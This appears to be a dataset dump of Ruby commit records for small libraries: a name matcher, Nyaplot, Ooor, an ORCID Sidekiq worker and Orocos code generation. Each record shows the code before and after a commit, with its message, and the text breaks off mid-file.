CombinedText stringlengths 4 3.42M |
|---|
# Compares two person names, treating them as equal when they differ only
# by case, non-letter characters, or a generational suffix (Jr, Sr, I-VII).
class NameMatcher
  # Generational suffixes that are ignored when comparing names.
  SUFFIXES = %w(i ii iii iv v vi vii jr sr).freeze

  # @param first_name [String] reference first name
  # @param last_name  [String] reference last name
  def initialize(first_name, last_name)
    @first_name = first_name.strip.downcase
    @last_name = last_name.strip.downcase
    @full_name = @first_name + @last_name
    @normalized_full_name = normalize(@full_name)
  end

  # True when the candidate name matches the reference name exactly
  # (ignoring case and non-letter characters) or differs from it only by a
  # recognized generational suffix.
  def match(test_first_name, test_last_name)
    test_full_name = (test_first_name + test_last_name).downcase
    normalized_test_full_name = normalize(test_full_name)
    return true if @normalized_full_name.eql?(normalized_test_full_name) # names are identical

    # Remove the shorter name from the longer one; for a match, whatever is
    # left over should be a generational suffix (or nothing at all).
    diff =
      if @normalized_full_name.length > normalized_test_full_name.length
        @normalized_full_name.gsub(normalized_test_full_name, '')
      else
        normalized_test_full_name.gsub(@normalized_full_name, '')
      end
    # `empty?` replaces the previous ActiveSupport-only `blank?`, which raised
    # NoMethodError in plain Ruby; normalized names contain no whitespace, so
    # the two predicates are equivalent here.
    SUFFIXES.include?(diff) || diff.empty?
  end

  private

  # Strips every non-letter character so punctuation/spacing differences do
  # not affect the comparison.
  def normalize(name)
    name.gsub(/[^a-z]/i, '')
  end
end
removed new line
# Matches person names, treating generational suffixes (Jr, Sr, I-VII) and
# non-letter characters as insignificant differences.
class NameMatcher
  SUFFIXES = %w(i ii iii iv v vi vii jr sr)

  def initialize(first_name, last_name)
    @first_name = first_name.strip.downcase
    @last_name = last_name.strip.downcase
    @full_name = @first_name + @last_name
    @normalized_full_name = normalize(@full_name)
  end

  # Returns true when the candidate name equals the reference name after
  # normalization, or when the only leftover text is a known suffix.
  def match(test_first_name, test_last_name)
    candidate = normalize((test_first_name + test_last_name).downcase)
    return true if @normalized_full_name.eql?(candidate) # names are identical

    # Strip the shorter name out of the longer one; a genuine match leaves
    # behind at most a generational suffix.
    longer, shorter =
      if @normalized_full_name.length > candidate.length
        [@normalized_full_name, candidate]
      else
        [candidate, @normalized_full_name]
      end
    diff = longer.gsub(shorter, '')
    SUFFIXES.include?(diff) || diff.blank?
  end

  private

  # Drops all non-letter characters from +name+.
  def normalize(name)
    name.gsub(/[^a-z]/i, '')
  end
end
module Nyaplot
  # Jsonizable object to which diagrams are registered.
  # Properties of Nyaplot::Plot are embedded into the JSON object as part of
  # the property 'panes' by Nyaplot::Frame.
  class Plot
    include Jsonizable
    # @!attribute width
    #   @return [Numeric] the width of the plot
    # @!attribute height
    #   @return [Numeric] the height of the plot
    # @!attribute margin
    #   @return [Hash] the margin around the plot
    # @!attribute xrange
    #   @return [Array<Numeric>, Array<String>, Array<Symbol>] the range of the x-axis
    # @!attribute yrange
    #   @return [Array<Numeric>, Array<String>, Array<Symbol>] the range of the y-axis
    # @!attribute x_label
    #   @return [String] the name of label placed along x-axis
    # @!attribute y_label
    #   @return [String] the name of label placed along y-axis
    # @!attribute bg_color
    #   @return [String] the code of color which background is filled in
    # @!attribute grid_color
    #   @return [String] the code of color which grid lines are filled in
    # @!attribute legend
    #   @return [Boolean] whether to show legend or not
    # @!attribute legend_width
    #   @return [Numeric] the width of legend area
    # @!attribute legend_options
    #   @return [Hash] extra options passed to the legend
    # @!attribute zoom
    #   @return [Boolean] whether to enable zooming
    # @!attribute rotate_x_label
    #   @return [Numeric] the angle to rotate x label (radian)
    # @!attribute rotate_y_label
    #   @return [Numeric] the angle to rotate y label (radian)
    define_properties(:diagrams, :filter)
    define_group_properties(:options, [:width, :height, :margin, :xrange, :yrange, :x_label, :y_label, :bg_color, :grid_color, :legend, :legend_width, :legend_options, :zoom, :rotate_x_label, :rotate_y_label])

    def initialize(&block)
      init_properties
      set_property(:diagrams, [])
      set_property(:options, {})
      set_property(:width, nil)
      set_property(:legend, nil)
      # Default :zoom to nil so before_to_json can distinguish "unset" from an
      # explicit zoom(false); previously an explicit false was overwritten.
      set_property(:zoom, nil)
      self.instance_eval(&block) if block_given?
    end

    # Add diagram with Array
    # @param [Symbol] type the type of diagram to add
    # @param [Array<Array>] *data array from which diagram is created
    # @example
    #   plot.add(:scatter, [0,1,2], [0,1,2])
    def add(type, *data)
      # Auto-generate column labels data0, data1, ... for the raw arrays.
      labels = data.map.with_index{|d, i| 'data' + i.to_s}
      raw_data = data.each.with_index.reduce({}){|memo, (d, i)| memo[labels[i]]=d; next memo}
      df = DataFrame.new(raw_data)
      return add_with_df(df, type, *labels)
    end

    # Add diagram with DataFrame
    # @param [DataFrame] df DataFrame from which diagram is created
    # @param [Symbol] type the type of diagram to add
    # @param [Array<Symbol>] *labels column labels for x, y or some other dimension
    # @example
    #   df = Nyaplot::DataFrame.new({x: [0,1,2], y: [0,1,2]})
    #   plot.add_with_df(df, :scatter, :x, :y)
    def add_with_df(df, type, *labels)
      diagram = Diagram.new(df, type, labels)
      diagrams = get_property(:diagrams)
      diagrams.push(diagram)
      return diagram
    end

    # Show plot automatically on IRuby notebook
    def to_iruby
      Frame.new.tap {|f| f.add(self) }.to_iruby
    end

    # Show plot on IRuby notebook
    def show
      Frame.new.tap {|f| f.add(self) }.show
    end

    # Export the plot as a standalone HTML file.
    # @param [String, nil] path output path; defaults to ./plot-<uuid>.html
    def export_html(path=nil)
      require 'securerandom'
      path = "./plot-" + SecureRandom.uuid().to_s + ".html" if path.nil?
      Frame.new.tap {|f| f.add(self) }.export_html(path)
    end

    # @return [Array<String>] names of dataframes used by diagrams belonging to this plot
    def df_list
      arr = []
      diagrams = get_property(:diagrams)
      diagrams.each{|d| arr.push(d.df_name)}
      return arr
    end

    # Fills in defaults (zoom, width, axis ranges) not specified by the user.
    # Invoked just before the plot is serialized to JSON.
    def before_to_json
      diagrams = get_property(:diagrams)
      return if diagrams.length == 0
      # set default values when not specified by users
      # Only auto-enable zooming when the user left it unset, so that an
      # explicit zoom(false) is respected.
      zoom(true) if zoom.nil? && diagrams.all?{|d| d.zoom?}
      if width.nil?
        if legend == true
          width(800)
        else
          width(700)
        end
      end
      [:xrange, :yrange].each do |symbol|
        if get_property(:options)[symbol].nil?
          range = []
          diagrams.each{|diagram| range.push(diagram.send(symbol))}
          if range.all? {|r| r.length == 2} # continuous data
            range = range.transpose
            range = [range[0].min, range[1].max]
            self.send(symbol, range)
          else # discrete data
            # Non-bang forms: flatten! returns nil when nothing changes, so
            # the old range.flatten!.uniq! chain could raise NoMethodError.
            range = range.flatten.uniq
            self.send(symbol, range)
          end
        end
      end
    end

    # Shortcut method to configure plot
    # @example
    #   plot = Nyaplot::Plot.new
    #   plot.configure do
    #     width(700)
    #     height(700)
    #   end
    def configure(&block)
      self.instance_eval(&block) if block_given?
    end
  end
end
Fix a zooming bug and resolve #26
module Nyaplot
  # Jsonizable object to which diagrams are registered.
  # Properties of Nyaplot::Plot are embedded into the JSON object as part of
  # the property 'panes' by Nyaplot::Frame.
  class Plot
    include Jsonizable
    # @!attribute width
    #   @return [Numeric] the width of the plot
    # @!attribute height
    #   @return [Numeric] the height of the plot
    # @!attribute margin
    #   @return [Hash] the margin around the plot
    # @!attribute xrange
    #   @return [Array<Numeric>, Array<String>, Array<Symbol>] the range of the x-axis
    # @!attribute yrange
    #   @return [Array<Numeric>, Array<String>, Array<Symbol>] the range of the y-axis
    # @!attribute x_label
    #   @return [String] the name of label placed along x-axis
    # @!attribute y_label
    #   @return [String] the name of label placed along y-axis
    # @!attribute bg_color
    #   @return [String] the code of color which background is filled in
    # @!attribute grid_color
    #   @return [String] the code of color which grid lines are filled in
    # @!attribute legend
    #   @return [Boolean] whether to show legend or not
    # @!attribute legend_width
    #   @return [Numeric] the width of legend area
    # @!attribute legend_options
    #   @return [Hash] extra options passed to the legend
    # @!attribute zoom
    #   @return [Boolean] whether to enable zooming
    # @!attribute rotate_x_label
    #   @return [Numeric] the angle to rotate x label (radian)
    # @!attribute rotate_y_label
    #   @return [Numeric] the angle to rotate y label (radian)
    define_properties(:diagrams, :filter)
    define_group_properties(:options, [:width, :height, :margin, :xrange, :yrange, :x_label, :y_label, :bg_color, :grid_color, :legend, :legend_width, :legend_options, :zoom, :rotate_x_label, :rotate_y_label])

    def initialize(&block)
      init_properties
      set_property(:diagrams, [])
      set_property(:options, {})
      set_property(:width, nil)
      set_property(:legend, nil)
      # nil means "not configured by the user"; before_to_json then decides.
      set_property(:zoom, nil)
      self.instance_eval(&block) if block_given?
    end

    # Add diagram with Array
    # @param [Symbol] type the type of diagram to add
    # @param [Array<Array>] *data array from which diagram is created
    # @example
    #   plot.add(:scatter, [0,1,2], [0,1,2])
    def add(type, *data)
      # Auto-generate column labels data0, data1, ... for the raw arrays.
      labels = data.map.with_index{|d, i| 'data' + i.to_s}
      raw_data = data.each.with_index.reduce({}){|memo, (d, i)| memo[labels[i]]=d; next memo}
      df = DataFrame.new(raw_data)
      return add_with_df(df, type, *labels)
    end

    # Add diagram with DataFrame
    # @param [DataFrame] df DataFrame from which diagram is created
    # @param [Symbol] type the type of diagram to add
    # @param [Array<Symbol>] *labels column labels for x, y or some other dimension
    # @example
    #   df = Nyaplot::DataFrame.new({x: [0,1,2], y: [0,1,2]})
    #   plot.add_with_df(df, :scatter, :x, :y)
    def add_with_df(df, type, *labels)
      diagram = Diagram.new(df, type, labels)
      diagrams = get_property(:diagrams)
      diagrams.push(diagram)
      return diagram
    end

    # Show plot automatically on IRuby notebook
    def to_iruby
      Frame.new.tap {|f| f.add(self) }.to_iruby
    end

    # Show plot on IRuby notebook
    def show
      Frame.new.tap {|f| f.add(self) }.show
    end

    # Export the plot as a standalone HTML file.
    # @param [String, nil] path output path; defaults to ./plot-<uuid>.html
    def export_html(path=nil)
      require 'securerandom'
      path = "./plot-" + SecureRandom.uuid().to_s + ".html" if path.nil?
      Frame.new.tap {|f| f.add(self) }.export_html(path)
    end

    # @return [Array<String>] names of dataframes used by diagrams belonging to this plot
    def df_list
      arr = []
      diagrams = get_property(:diagrams)
      diagrams.each{|d| arr.push(d.df_name)}
      return arr
    end

    # Fills in defaults (zoom, width, axis ranges) not specified by the user.
    # Invoked just before the plot is serialized to JSON.
    def before_to_json
      diagrams = get_property(:diagrams)
      return if diagrams.length == 0
      # set default values when not specified by users
      zoom(true) if zoom.nil? && diagrams.all?{|d| d.zoom?}
      if width.nil?
        if legend == true
          width(800)
        else
          width(700)
        end
      end
      [:xrange, :yrange].each do |symbol|
        if get_property(:options)[symbol].nil?
          range = []
          diagrams.each{|diagram| range.push(diagram.send(symbol))}
          if range.all? {|r| r.length == 2} # continuous data
            range = range.transpose
            range = [range[0].min, range[1].max]
            self.send(symbol, range)
          else # discrete data
            # Non-bang forms: flatten! returns nil when nothing changes, so
            # the old range.flatten!.uniq! chain could raise NoMethodError.
            range = range.flatten.uniq
            self.send(symbol, range)
          end
        end
      end
    end

    # Shortcut method to configure plot
    # @example
    #   plot = Nyaplot::Plot.new
    #   plot.configure do
    #     width(700)
    #     height(700)
    #   end
    def configure(&block)
      self.instance_eval(&block) if block_given?
    end
  end
end
|
module Nydp
# Gem version string for the nydp library.
VERSION = "0.2.4"
end
version: bump to 0.2.5
module Nydp
# Gem version string for the nydp library.
VERSION = "0.2.5"
end
|
module Nydp
# Gem version string for the nydp library.
VERSION = "0.1.7.1"
end
version: bump to 0.1.8
module Nydp
# Gem version string for the nydp library.
VERSION = "0.1.8"
end
|
module NYNY
# Gem version string for the NYNY library.
VERSION = "1.0.1"
end
Bump version
module NYNY
# Gem version string for the NYNY library.
VERSION = "1.1.0"
end
|
require 'ooor/services'
module Ooor
# A Session wraps an Ooor connection (delegating unknown calls to it via
# SimpleDelegator), exposes the OpenERP/Odoo RPC services, and registers
# Ruby classes for the server-side models on demand.
class Session < SimpleDelegator
include Transport
attr_accessor :web_session, :connection, :id
# Lazily-instantiated RPC service accessors.
def common(); @common_service ||= CommonService.new(self); end
def db(); @db_service ||= DbService.new(self); end
def object(); @object_service ||= ObjectService.new(self); end
def report(); @report_service ||= ReportService.new(self); end
# @param connection underlying Ooor connection (also the delegation target)
# @param web_session [Hash, nil] web session data; defaults to {}
# @param id [String, nil] session id; falls back to web_session[:session_id]
def initialize(connection, web_session, id)
super(connection)
@connection = connection
@web_session = web_session || {}
# NOTE(review): reads the local `web_session` (possibly nil), not
# @web_session, so this raises NoMethodError when both id and web_session
# are nil — confirm whether @web_session was intended.
@id = id || web_session[:session_id]
end
# NOTE(review): @session is never assigned anywhere in this class, so this
# would raise NoMethodError on nil; it is also silently overridden by the
# `def[](model_key)` definition further down.
def [](key)
@session[key]
end
# NOTE(review): same @session problem as above — this writer cannot work.
def []=(key, value)
@session[key] = value
end
# Merges the given options into the session config and (re)loads models.
def global_login(options)
config.merge!(options)
load_models(config[:models], options[:reload])
end
# Resolves a model key — optionally through per-language aliases taken from
# config[:aliases] — and registers/returns the corresponding model class.
def const_get(model_key, lang=nil);
if config[:aliases]
if lang && alias_data = config[:aliases][lang]
openerp_model = alias_data[model_key] || model_key
elsif alias_data = config[:aliases][connection_session['lang'] || :en_US]
openerp_model = alias_data[model_key] || model_key
else
openerp_model = model_key
end
else
openerp_model = model_key
end
define_openerp_model(model: openerp_model, scope_prefix: config[:scope_prefix])
end
def[](model_key) #TODO invert: define method here and use []
const_get(model_key)
end
# Requires helper files, then registers a model class for every matching
# ir.model record found on the server.
def load_models(model_names=config[:models], reload=config[:reload])
helper_paths.each do |dir|
Dir[dir].each { |file| require file }
end
domain = model_names ? [['model', 'in', model_names]] : []
search_domain = domain - [1]
model_ids = object.object_service(:execute, "ir.model", :search, search_domain, 0, false, false, {}, false, {:context_index=>4})
models_records = object.object_service(:execute, "ir.model", :read, model_ids, ['model', 'name']) #TODO use search_read
models_records.each do |opts|
options = HashWithIndifferentAccess.new(opts.merge(scope_prefix: config[:scope_prefix], reload: reload))
define_openerp_model(options)
end
end
# Attaches a ModelTemplate to klass, reusing a cached template for this
# model when one exists so the fields are not reloaded.
def set_model_template!(klass, options)
templates = Ooor.model_registry_handler.models(config)
if template = templates[options[:model]] #using a template avoids to reload the fields
klass.t = template
else
template = Ooor::ModelTemplate.new
template.openerp_model = options[:model]
template.openerp_id = options[:id]
template.description = options[:name]
template.state = options[:state]
template.many2one_associations = {}
template.one2many_associations = {}
template.many2many_associations = {}
template.polymorphic_m2o_associations = {}
template.associations_keys = []
klass.t = template
templates[options[:model]] = template
end
end
# Builds (or returns the cached) Ruby class for an OpenERP model and always
# registers it as a constant under the configured scope.
def define_openerp_model(options) #TODO param to tell if we define constants or not
scope_prefix = options[:scope_prefix]
scope = scope_prefix ? Object.const_get(scope_prefix) : Object
model_class_name = class_name_from_model_key(options[:model])
if !models[options[:model]] || options[:reload] || !scope.const_defined?(model_class_name)
logger.debug "registering #{model_class_name}"
klass = Class.new(Base)
set_model_template!(klass, options)
klass.name = model_class_name
klass.scope_prefix = scope_prefix
klass.connection = self
if options[:reload] || !scope.const_defined?(model_class_name)
scope.const_set(model_class_name, klass)
end
# Apply any user-registered class extensions for this model.
(Ooor.extensions[options[:model]] || []).each do |block|
klass.class_eval(&block)
end
models[options[:model]] = klass
end
models[options[:model]]
end
# Cache of registered model classes, keyed by OpenERP model name.
def models; @models ||= {}; end
def logger; Ooor.logger; end
end
end
model constant generation is now optional
require 'ooor/services'
module Ooor
# A Session wraps an Ooor connection (delegating unknown calls to it via
# SimpleDelegator), exposes the OpenERP/Odoo RPC services, and registers
# Ruby classes for the server-side models on demand. Constant generation is
# controlled by config[:generate_constants].
class Session < SimpleDelegator
include Transport
attr_accessor :web_session, :connection, :id
# Lazily-instantiated RPC service accessors.
def common(); @common_service ||= CommonService.new(self); end
def db(); @db_service ||= DbService.new(self); end
def object(); @object_service ||= ObjectService.new(self); end
def report(); @report_service ||= ReportService.new(self); end
# @param connection underlying Ooor connection (also the delegation target)
# @param web_session [Hash, nil] web session data; defaults to {}
# @param id [String, nil] session id; falls back to web_session[:session_id]
def initialize(connection, web_session, id)
super(connection)
@connection = connection
@web_session = web_session || {}
# NOTE(review): reads the local `web_session` (possibly nil), not
# @web_session, so this raises NoMethodError when both id and web_session
# are nil — confirm whether @web_session was intended.
@id = id || web_session[:session_id]
end
# NOTE(review): @session is never assigned anywhere in this class, so this
# would raise NoMethodError on nil; it is also silently overridden by the
# `def[](model_key)` definition further down.
def [](key)
@session[key]
end
# NOTE(review): same @session problem as above — this writer cannot work.
def []=(key, value)
@session[key] = value
end
# Merges the given options into the session config and (re)loads models.
def global_login(options)
config.merge!(options)
load_models(config[:models], options[:reload])
end
# Resolves a model key — optionally through per-language aliases taken from
# config[:aliases] — and registers/returns the corresponding model class.
def const_get(model_key, lang=nil);
if config[:aliases]
if lang && alias_data = config[:aliases][lang]
openerp_model = alias_data[model_key] || model_key
elsif alias_data = config[:aliases][connection_session['lang'] || :en_US]
openerp_model = alias_data[model_key] || model_key
else
openerp_model = model_key
end
else
openerp_model = model_key
end
define_openerp_model(model: openerp_model, scope_prefix: config[:scope_prefix], generate_constants: config[:generate_constants])
end
def[](model_key) #TODO invert: define method here and use []
const_get(model_key)
end
# Requires helper files, then registers a model class for every matching
# ir.model record found on the server.
def load_models(model_names=config[:models], reload=config[:reload])
helper_paths.each do |dir|
Dir[dir].each { |file| require file }
end
domain = model_names ? [['model', 'in', model_names]] : []
search_domain = domain - [1]
model_ids = object.object_service(:execute, "ir.model", :search, search_domain, 0, false, false, {}, false, {:context_index=>4})
models_records = object.object_service(:execute, "ir.model", :read, model_ids, ['model', 'name']) #TODO use search_read
models_records.each do |opts|
options = HashWithIndifferentAccess.new(opts.merge(scope_prefix: config[:scope_prefix], reload: reload, generate_constants: config[:generate_constants]))
define_openerp_model(options)
end
end
# Attaches a ModelTemplate to klass, reusing a cached template for this
# model when one exists so the fields are not reloaded.
def set_model_template!(klass, options)
templates = Ooor.model_registry_handler.models(config)
if template = templates[options[:model]] #using a template avoids to reload the fields
klass.t = template
else
template = Ooor::ModelTemplate.new
template.openerp_model = options[:model]
template.openerp_id = options[:id]
template.description = options[:name]
template.state = options[:state]
template.many2one_associations = {}
template.one2many_associations = {}
template.many2many_associations = {}
template.polymorphic_m2o_associations = {}
template.associations_keys = []
klass.t = template
templates[options[:model]] = template
end
end
# Builds (or returns the cached) Ruby class for an OpenERP model; a global
# constant is created only when options[:generate_constants] is truthy.
# NOTE(review): the trailing TODO below is stale — the parameter now exists.
def define_openerp_model(options) #TODO param to tell if we define constants or not
if !models[options[:model]] || options[:reload]# || !scope.const_defined?(model_class_name)
scope_prefix = options[:scope_prefix]
scope = scope_prefix ? Object.const_get(scope_prefix) : Object
model_class_name = class_name_from_model_key(options[:model])
logger.debug "registering #{model_class_name}"
klass = Class.new(Base)
set_model_template!(klass, options)
klass.name = model_class_name
klass.scope_prefix = scope_prefix
klass.connection = self
if options[:generate_constants] && (options[:reload] || !scope.const_defined?(model_class_name))
scope.const_set(model_class_name, klass)
end
# Apply any user-registered class extensions for this model.
(Ooor.extensions[options[:model]] || []).each do |block|
klass.class_eval(&block)
end
models[options[:model]] = klass
end
models[options[:model]]
end
# Cache of registered model classes, keyed by OpenERP model name.
def models; @models ||= {}; end
def logger; Ooor.logger; end
end
end
|
require 'open-uri'
# Background job that looks up a user's public name on ORCID and stores it
# on the local User record.
class OrcidWorker
  include Sidekiq::Worker

  # @param orcid_id [String] the ORCID identifier, also used as the user's uid
  def perform(orcid_id)
    user = User.find_by_uid(orcid_id)
    return if user.nil? # no matching local user — nothing to update
    name = orcid_name_for(orcid_id)
    user.update_attributes(:name => name)
  end

  # Fetches the public bio for +orcid_id+ and formats a display name,
  # falling back to the given name alone when no family name is published.
  # @return [String] "Surname, Given" or just the given name
  def orcid_name_for(orcid_id)
    data = JSON.parse(open("http://pub.orcid.org/v1.1/#{orcid_id}/orcid-bio", "Accept" => "application/orcid+json").read)
    details = data['orcid-profile']['orcid-bio']['personal-details']
    given_name = details['given-names']['value']
    # Some ORCID profiles publish no family name; guard against the missing
    # key instead of raising NoMethodError on nil.
    if details.has_key?('family-name')
      "#{details['family-name']['value']}, #{given_name}"
    else
      "#{given_name}"
    end
  end
end
Fix ORCID worker
require 'open-uri'
# Sidekiq job that refreshes a local user's display name from their public
# ORCID bio.
class OrcidWorker
  include Sidekiq::Worker

  # Looks up the user by ORCID id and stores the formatted name.
  def perform(orcid_id)
    user = User.find_by_uid(orcid_id)
    name = orcid_name_for(orcid_id)
    user.update_attributes(:name => name)
  end

  # Builds "Surname, Given" from the public ORCID bio, or just the given
  # name when the profile publishes no family name.
  def orcid_name_for(orcid_id)
    url = "http://pub.orcid.org/v1.1/#{orcid_id}/orcid-bio"
    data = JSON.parse(open(url, "Accept" => "application/orcid+json").read)
    details = data['orcid-profile']['orcid-bio']['personal-details']
    given_name = details['given-names']['value']
    if details.has_key?('family-name')
      "#{details['family-name']['value']}, #{given_name}"
    else
      "#{given_name}"
    end
  end
end
|
require 'utilrb/module/attr_predicate'
require 'utilrb/value_set'
module Orocos
# Validates that +type+ may be used as a toplevel type (property, port or
# operation argument): arrays must be wrapped in a structure, and among
# numeric types only the base RTT types are accepted.
# @raise [ArgumentError] when the type cannot be used as a toplevel type
def self.validate_toplevel_type(type)
if type < Typelib::ArrayType
raise ArgumentError, "array types can be used only in a structure"
elsif type < Typelib::NumericType && !Typelib::Registry.base_rtt_type?(type)
raise ArgumentError, "#{type.name} cannot be used as a toplevel type"
end
end
module Generation
# Maps the DSL activity symbols to the RTT activity class names used in
# generated code. Frozen so the shared constant cannot be mutated.
ACTIVITY_TYPES = {
  :fd_driven => 'FileDescriptorActivity',
  :irq_driven => 'IRQActivity',
  :slave => 'SlaveActivity',
  :periodic => 'PeriodicActivity',
  :triggered => 'NonPeriodicActivity',
  :sequential => 'SequentialActivity'
}.freeze
# Model of a task property as declared in the oroGen specification.
class Property
# The task on which this property is attached
attr_reader :task
# The property name
attr_reader :name
# The property type, as a Typelib::Type object from the underlying
# component's type registry
attr_reader :type
# The name of the type this property is using, for consistency with
# the +type+ attribute
def type_name; type.name end
# The Typelib types referenced by this property (only its own type).
def used_types; [type] end
# The property's default value
attr_reader :default_value
# The property default value, formatted for as a C++ value
def cxx_default_value
if type < Typelib::EnumType
# Enum defaults must be qualified with the enum's C++ namespace.
type.namespace('::') + default_value.to_s
else
default_value.inspect
end
end
# Create a new property with the given name, type and default value
# @raise [ArgumentError] if +name+ is not a valid C++ identifier or if the
#   type cannot be used as a toplevel type
def initialize(task, name, type, default_value)
name = name.to_s
if name !~ /^\w+$/
raise ArgumentError, "property names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
@name, @type, @default_value = name, type, default_value
end
# Pretty-prints "name:type[: doc]".
def pretty_print(pp)
pp.text "#{name}:#{type.name}"
if doc
pp.text ": #{doc}"
end
end
# call-seq:
# doc new_doc -> self
# doc -> current_doc
#
# Gets/sets a string describing this object
dsl_attribute(:doc) { |value| value.to_s }
end
# Generic representation of ports. The actual ports are either
# instance of InputPort or OutputPort
class Port
# The port task
attr_reader :task
# The port name
attr_reader :name
# The port type
attr_reader :type
# The port type name
def type_name; type.name end
# The Typelib types referenced by this port (only its own type).
def used_types; [type] end
# True if the component supports only static connections on this
# port, and false otherwise
#
# See #static for more details.
def static?; !!@static end
# Declares that this port can be connected/disconnected only when
# the component is in a non-running state.
#
# The default is that the port is dynamic, i.e. can be
# connected/disconnected regardless of the component's state.
#
# See also #dynamic
def static; @static = true end
# Declares that this port can be connected/disconnected while the
# component is running. It is the opposite of #static.
#
# This is the default
def dynamic; @static = false end
# Pretty-prints "[in|out]name:type".
def pretty_print(pp)
pp.text "[#{self.kind_of?(InputPort) ? "in" : "out"}]#{name}:#{type_name}"
end
# @raise [ArgumentError] if a non-Regexp name is not a valid C++
#   identifier, or if the type cannot be used as a toplevel type
def initialize(task, name, type)
# A Regexp name is allowed (used for dynamic port declarations) and is
# kept as-is; only plain names are validated as C++ identifiers.
if !name.kind_of?(Regexp)
name = name.to_s
if name !~ /^\w+$/
raise ArgumentError, "port names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
end
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
if type.name == "/std/vector<double>"
Orocos::Generation.warn "#{type.name} is used as the port type for #{name}, logging it will not be possible"
end
@task, @name, @type = task, name, type
end
# call-seq:
# doc new_doc -> self
# doc -> current_doc
#
# Gets/sets a string describing this object
dsl_attribute(:doc) { |value| value.to_s }
end
# Specification for an output port
class OutputPort < Port
def initialize(*args)
super
# Defaults: one sample per write, written every cycle, no burst, no
# input-port triggers.
@sample_size = 1
@period = 1
@burst_size = nil
@burst_period = nil
@port_triggers = Set.new
end
# Returns the name of the Orocos class for this port (i.e. one of
# ReadDataPort, WriteDataPort, DataPort, ReadBufferPort, ...)
def orocos_class; "RTT::OutputPort" end
# Maximal number of samples written at once during a burst (see #burst).
attr_reader :burst_size
# How often a burst can happen, in cycles (see #burst).
attr_reader :burst_period
# call-seq:
# sample_size new_size -> self
# sample_size -> size
#
# Sets and gets the sample size, i.e. how many data samples are
# pushed at once to this port.
dsl_attribute(:sample_size) { |value| Integer(value) }
# call-seq:
# period new_period -> self
# period -> current_period
#
# Sets the period for this output port, in cycles. The port period
# should be the minimal amount of execution cycles (calls to
# updateHook) between two updates of this port.
#
# See #sample_size and #burst for other parameters describing the
# behaviour of this port.
#
# The default is one.
dsl_attribute(:period) { |value| Integer(value) }
# call-seq:
# burst count, period -> self
#
# Declares that a burst of data can occasionally be written to this
# port. +count+ is the maximal number of samples that are pushed to
# this port at once, and +period+ how often this burst can happen.
#
# If the perid is set to 0, then it is assumed that the bursts
# happen 'every once in a while', i.e. that it can be assumed that
# the event is rare enough.
#
# The default is no burst
def burst(size, period = 1)
@burst_size = Integer(size)
@burst_period = Integer(period)
self
end
# The set of input ports that will cause a write on this output
attr_reader :port_triggers
# call-seq:
# triggered_on input_port_name, input_port_name, ...
#
# Declares that this port will be written whenever a sample is
# received on the given input ports. The default is to consider that
# the port is written whenever updateHook() is called.
#
# You may want to call #triggered_on_update if the port will be
# written for each call to updateHook too.
def triggered_on(*input_ports)
# Resolve the port names into the task's port objects.
@port_triggers |= input_ports.to_set.map { |name| task.port(name) }
self
end
# call-seq:
# triggered_on_update
#
# Declares that this port will be written for each call of the
# updateHook(). It is the default if #triggered_on has not been
# called.
def triggered_on_update
@triggered_on_update = true
self
end
# True if the port will be written for the calls to updateHook()
# that are triggered by the activity.
#
# See #triggered_on_update and #triggered_on
def triggered_on_update?
# With no port triggers declared, updateHook-triggered writes are the
# default; otherwise the flag must have been set explicitly.
if !@port_triggers.empty?
!!@triggered_on_update
else
true
end
end
end
# Specification for an input port
class InputPort < Port
# Returns the name of the Orocos class for this port (i.e. one of
# ReadDataPort, WriteDataPort, DataPort, ReadBufferPort, ...)
def orocos_class; "RTT::InputPort" end
# Either :data (default) or :buffer — the connection policy this port
# requires (see #needs_buffered_connection / #needs_data_connection).
attr_reader :required_connection_type
def initialize(*args)
super
@required_connection_type = :data
end
# True if connections to this port must use a buffered.
# In general, it means that the task's code check the return value
# of read(), as in
#
# if (_input.read(value))
# {
# // data is available, do something
# }
def needs_buffered_connection; @required_connection_type = :buffer; self end
# True if connections to this port must use a data policy.
#
# This should not be useful in general
def needs_data_connection; @required_connection_type = :data; self end
# Returns true if the component requires connections to this port to
# be reliable (i.e. non-lossy).
#
# See #needs_reliable_policy for more information
def needs_reliable_connection?; @needs_reliable_connection end
# Declares that the components requires a non-lossy policy
#
# This is different from #requires_buffered_connection as a data
# policy could be used if the period of the connection's source is
# much longer than the period of the connection's end (for
# instance).
def needs_reliable_connection; @needs_reliable_connection = true; self end
end
# Mixin for port models that are created at runtime rather than being
# statically declared on the task (see DynamicInputPort/DynamicOutputPort).
module DynamicPort
# Returns a copy of this port model bound to the given concrete name.
def instanciate(name)
m = dup
m.instance_variable_set :@name, name
m
end
# Pretty-prints "[dyn,in|out]name:type".
def pretty_print(pp)
pp.text "[dyn,#{self.class < InputPort ? "in" : "out"}]#{name}:#{type_name}"
end
end
# Specification for a dynamic output port.
#
# Dynamic ports are not statically present, but will be created at
# runtime. They are added by TaskContext#dynamic_output_port.
# Output port whose concrete instances are created at runtime via
# DynamicPort#instanciate.
class DynamicOutputPort < OutputPort
include DynamicPort
end
# Specification for a dynamic input port.
#
# Dynamic ports are not statically present, but will be created at
# runtime. They are added by TaskContext#dynamic_input_port.
# Input port whose concrete instances are created at runtime via
# DynamicPort#instanciate.
class DynamicInputPort < InputPort
include DynamicPort
end
# Base class for methods and commands
class Callable
# The TaskContext instance this method is part of
attr_reader :task
# The method name
attr_reader :name
# @raise [ArgumentError] if +name+ is not a valid C++ identifier
def initialize(task, name)
name = name.to_s
if name !~ /^\w+$/
raise ArgumentError, "#{self.class.name.downcase} names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
@task = task
@name = name
@arguments = []
end
# call-seq:
# doc new_doc -> self
# doc -> current_doc
#
# Gets/sets a string describing this object
dsl_attribute(:doc) { |value| value.to_s }
# The set of arguments of this method, as an array of [name, type,
# doc] elements. The +type+ objects are Typelib::Type instances.
#
# See #argument
attr_reader :arguments
# Defines the next argument of this method. +name+ is the argument
# name and +type+ is either the type name as a string, or a
# Typelib::Type object. In both cases, the required type must be
# defined in the component, either because it is part of its own
# toolkit or because it has been imported by a
# Component#load_toolkit call.
#
# Note that Orocos::RTT does not support having more than 4
# arguments for a method, and trying that will therefore raise an
# error
# @raise [ArgumentError] when a fifth argument is added or the type is
#   invalid as a toplevel type
